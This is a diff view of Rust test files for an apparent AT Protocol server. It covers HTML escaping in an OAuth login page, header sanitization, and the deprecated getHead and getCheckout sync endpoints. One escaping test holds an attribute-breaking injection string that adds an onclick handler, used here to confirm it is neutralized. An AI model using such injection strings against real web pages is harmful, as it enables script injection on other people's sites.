assert!(html.contains("&#39;") || html.contains("&apos;"), "Single quotes should be escaped"); 328 + } 329 + 330 + #[test] 331 + fn test_html_escape_angle_brackets() { 332 + let html = login_page("client<test>more", None, None, "test-uri", None, None); 333 + assert!(html.contains("&lt;"), "Less than should be escaped"); 334 + assert!(html.contains("&gt;"), "Greater than should be escaped"); 335 + assert!(!html.contains("<test>"), "Raw angle brackets should not appear"); 336 + } 337 + 338 + #[test] 339 + fn test_oauth_template_preserves_safe_content() { 340 + let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com")); 341 + 342 + assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved"); 343 + assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved"); 344 + assert!(html.contains("user@example.com"), "Login hint should be preserved"); 345 + } 346 + 347 + #[test] 348 + fn test_csrf_like_input_value_protection() { 349 + let malicious = "\" onclick=\"alert('csrf')"; 350 + let html = login_page("client", None, None, malicious, None, None); 351 + 352 + assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable"); 353 + } 354 + 355 + #[test] 356 + fn test_unicode_handling_in_templates() { 357 + let unicode_client = "客户端 クライアント"; 358 + let html = login_page(unicode_client, None, None, "test-uri", None, None); 359 + 360 + assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded"); 361 + } 362 + 363 + #[test] 364 + fn test_null_byte_in_input() { 365 + let with_null = "client\0id"; 366 + let sanitized = sanitize_header_value(with_null); 367 + 368 + assert!(sanitized.contains("client"), "Content before null should be preserved"); 369 + } 370 + 371 + #[test] 372 + fn test_very_long_input_handling() { 373 + let long_input = "x".repeat(10000); 374 + let sanitized = sanitize_header_value(&long_input); 375 + 376 + assert!(!sanitized.is_empty(), "Long input should still produce output"); 377 + }
+307
tests/sync_deprecated.rs
···
··· 1 + mod common; 2 + mod helpers; 3 + use common::*; 4 + use helpers::*; 5 + 6 + use reqwest::StatusCode; 7 + use serde_json::Value; 8 + 9 + #[tokio::test] 10 + async fn test_get_head_success() { 11 + let client = client(); 12 + let (did, _jwt) = setup_new_user("gethead-success").await; 13 + 14 + let res = client 15 + .get(format!( 16 + "{}/xrpc/com.atproto.sync.getHead", 17 + base_url().await 18 + )) 19 + .query(&[("did", did.as_str())]) 20 + .send() 21 + .await 22 + .expect("Failed to send request"); 23 + 24 + assert_eq!(res.status(), StatusCode::OK); 25 + let body: Value = res.json().await.expect("Response was not valid JSON"); 26 + assert!(body["root"].is_string()); 27 + let root = body["root"].as_str().unwrap(); 28 + assert!(root.starts_with("bafy"), "Root CID should be a CID"); 29 + } 30 + 31 + #[tokio::test] 32 + async fn test_get_head_not_found() { 33 + let client = client(); 34 + let res = client 35 + .get(format!( 36 + "{}/xrpc/com.atproto.sync.getHead", 37 + base_url().await 38 + )) 39 + .query(&[("did", "did:plc:nonexistent12345")]) 40 + .send() 41 + .await 42 + .expect("Failed to send request"); 43 + 44 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 45 + let body: Value = res.json().await.expect("Response was not valid JSON"); 46 + assert_eq!(body["error"], "HeadNotFound"); 47 + assert!(body["message"].as_str().unwrap().contains("Could not find root")); 48 + } 49 + 50 + #[tokio::test] 51 + async fn test_get_head_missing_param() { 52 + let client = client(); 53 + let res = client 54 + .get(format!( 55 + "{}/xrpc/com.atproto.sync.getHead", 56 + base_url().await 57 + )) 58 + .send() 59 + .await 60 + .expect("Failed to send request"); 61 + 62 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 63 + } 64 + 65 + #[tokio::test] 66 + async fn test_get_head_empty_did() { 67 + let client = client(); 68 + let res = client 69 + .get(format!( 70 + "{}/xrpc/com.atproto.sync.getHead", 71 + base_url().await 72 + )) 73 + .query(&[("did", "")]) 74 + .send() 75 + .await 76 + .expect("Failed to send request"); 77 + 78 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 79 + let body: Value = res.json().await.expect("Response was not valid JSON"); 80 + assert_eq!(body["error"], "InvalidRequest"); 81 + } 82 + 83 + #[tokio::test] 84 + async fn test_get_head_whitespace_did() { 85 + let client = client(); 86 + let res = client 87 + .get(format!( 88 + "{}/xrpc/com.atproto.sync.getHead", 89 + base_url().await 90 + )) 91 + .query(&[("did", " ")]) 92 + .send() 93 + .await 94 + .expect("Failed to send request"); 95 + 96 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 97 + } 98 + 99 + #[tokio::test] 100 + async fn test_get_head_changes_after_record_create() { 101 + let client = client(); 102 + let (did, jwt) = setup_new_user("gethead-changes").await; 103 + 104 + let res1 = client 105 + .get(format!( 106 + "{}/xrpc/com.atproto.sync.getHead", 107 + base_url().await 108 + )) 109 + .query(&[("did", did.as_str())]) 110 + .send() 111 + .await 112 + .expect("Failed to get initial head"); 113 + let body1: Value = res1.json().await.unwrap(); 114 + let head1 = body1["root"].as_str().unwrap().to_string(); 115 + 116 + create_post(&client, &did, &jwt, "Post to change head").await; 117 + 118 + let res2 = client 119 + .get(format!( 120 + "{}/xrpc/com.atproto.sync.getHead", 121 + base_url().await 122 + )) 123 + .query(&[("did", did.as_str())]) 124 + .send() 125 + .await 126 + .expect("Failed to get head after record"); 127 + let body2: Value = res2.json().await.unwrap(); 128 + let head2 = body2["root"].as_str().unwrap().to_string(); 129 + 130 + assert_ne!(head1, head2, "Head CID should change after record creation"); 131 + } 132 + 133 + #[tokio::test] 134 + async fn test_get_checkout_success() { 135 + let client = client(); 136 + let (did, jwt) = setup_new_user("getcheckout-success").await; 137 + 138 + create_post(&client, &did, &jwt, "Post for checkout test").await; 139 + 140 + let res = client 141 + .get(format!( 142 + "{}/xrpc/com.atproto.sync.getCheckout", 143 + base_url().await 144 + )) 145 + .query(&[("did", did.as_str())]) 146 + .send() 147 + .await 148 + .expect("Failed to send request"); 149 + 150 + assert_eq!(res.status(), StatusCode::OK); 151 + assert_eq!( 152 + res.headers() 153 + .get("content-type") 154 + .and_then(|h| h.to_str().ok()), 155 + Some("application/vnd.ipld.car") 156 + ); 157 + let body = res.bytes().await.expect("Failed to get body"); 158 + assert!(!body.is_empty(), "CAR file should not be empty"); 159 + assert!(body.len() > 50, "CAR file should contain actual data"); 160 + } 161 + 162 + #[tokio::test] 163 + async fn test_get_checkout_not_found() { 164 + let client = client(); 165 + let res = client 166 + .get(format!( 167 + "{}/xrpc/com.atproto.sync.getCheckout", 168 + base_url().await 169 + )) 170 + .query(&[("did", "did:plc:nonexistent12345")]) 171 + .send() 172 + .await 173 + .expect("Failed to send request"); 174 + 175 + assert_eq!(res.status(), StatusCode::NOT_FOUND); 176 + let body: Value = res.json().await.expect("Response was not valid JSON"); 177 + assert_eq!(body["error"], "RepoNotFound"); 178 + } 179 + 180 + #[tokio::test] 181 + async fn test_get_checkout_missing_param() { 182 + let client = client(); 183 + let res = client 184 + .get(format!( 185 + "{}/xrpc/com.atproto.sync.getCheckout", 186 + base_url().await 187 + )) 188 + .send() 189 + .await 190 + .expect("Failed to send request"); 191 + 192 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 193 + } 194 + 195 + #[tokio::test] 196 + async fn test_get_checkout_empty_did() { 197 + let client = client(); 198 + let res = client 199 + .get(format!( 200 + "{}/xrpc/com.atproto.sync.getCheckout", 201 + base_url().await 202 + )) 203 + .query(&[("did", "")]) 204 + .send() 205 + .await 206 + .expect("Failed to send request"); 207 + 208 + assert_eq!(res.status(), StatusCode::BAD_REQUEST); 209 + } 210 + 211 + #[tokio::test] 212 + async fn test_get_checkout_empty_repo() { 213 + let client = client(); 214 + let (did, _jwt) = setup_new_user("getcheckout-empty").await; 215 + 216 + let res = client 217 + .get(format!( 218 + "{}/xrpc/com.atproto.sync.getCheckout", 219 + base_url().await 220 + )) 221 + .query(&[("did", did.as_str())]) 222 + .send() 223 + .await 224 + .expect("Failed to send request"); 225 + 226 + assert_eq!(res.status(), StatusCode::OK); 227 + let body = res.bytes().await.expect("Failed to get body"); 228 + assert!(!body.is_empty(), "Even empty repo should return CAR header"); 229 + } 230 + 231 + #[tokio::test] 232 + async fn test_get_checkout_includes_multiple_records() { 233 + let client = client(); 234 + let (did, jwt) = setup_new_user("getcheckout-multi").await; 235 + 236 + for i in 0..5 { 237 + tokio::time::sleep(std::time::Duration::from_millis(50)).await; 238 + create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await; 239 + } 240 + 241 + let res = client 242 + .get(format!( 243 + "{}/xrpc/com.atproto.sync.getCheckout", 244 + base_url().await 245 + )) 246 + .query(&[("did", did.as_str())]) 247 + .send() 248 + .await 249 + .expect("Failed to send request"); 250 + 251 + assert_eq!(res.status(), StatusCode::OK); 252 + let body = res.bytes().await.expect("Failed to get body"); 253 + assert!(body.len() > 500, "CAR file with 5 records should be larger"); 254 + } 255 + 256 + #[tokio::test] 257 + async fn test_get_head_matches_latest_commit() { 258 + let client = client(); 259 + let (did, _jwt) = setup_new_user("gethead-matches-latest").await; 260 + 261 + let head_res = client 262 + .get(format!( 263 + "{}/xrpc/com.atproto.sync.getHead", 264 + base_url().await 265 + )) 266 + .query(&[("did", did.as_str())]) 267 + .send() 268 + .await 269 + .expect("Failed to get head"); 270 + let head_body: Value = head_res.json().await.unwrap(); 271 + let head_root = head_body["root"].as_str().unwrap(); 272 + 273 + let latest_res = client 274 + .get(format!( 275 + "{}/xrpc/com.atproto.sync.getLatestCommit", 276 + base_url().await 277 + )) 278 + .query(&[("did", did.as_str())]) 279 + .send() 280 + .await 281 + .expect("Failed to get latest commit"); 282 + let latest_body: Value = latest_res.json().await.unwrap(); 283 + let latest_cid = latest_body["cid"].as_str().unwrap(); 284 + 285 + assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid"); 286 + } 287 + 288 + #[tokio::test] 289 + async fn test_get_checkout_car_header_valid() { 290 + let client = client(); 291 + let (did, _jwt) = setup_new_user("getcheckout-header").await; 292 + 293 + let res = client 294 + .get(format!( 295 + "{}/xrpc/com.atproto.sync.getCheckout", 296 + base_url().await 297 + )) 298 + .query(&[("did", did.as_str())]) 299 + .send() 300 + .await 301 + .expect("Failed to send request"); 302 + 303 + assert_eq!(res.status(), StatusCode::OK); 304 + let body = res.bytes().await.expect("Failed to get body"); 305 + 306 + assert!(body.len() >= 2, "CAR file should have at least header length"); 307 + }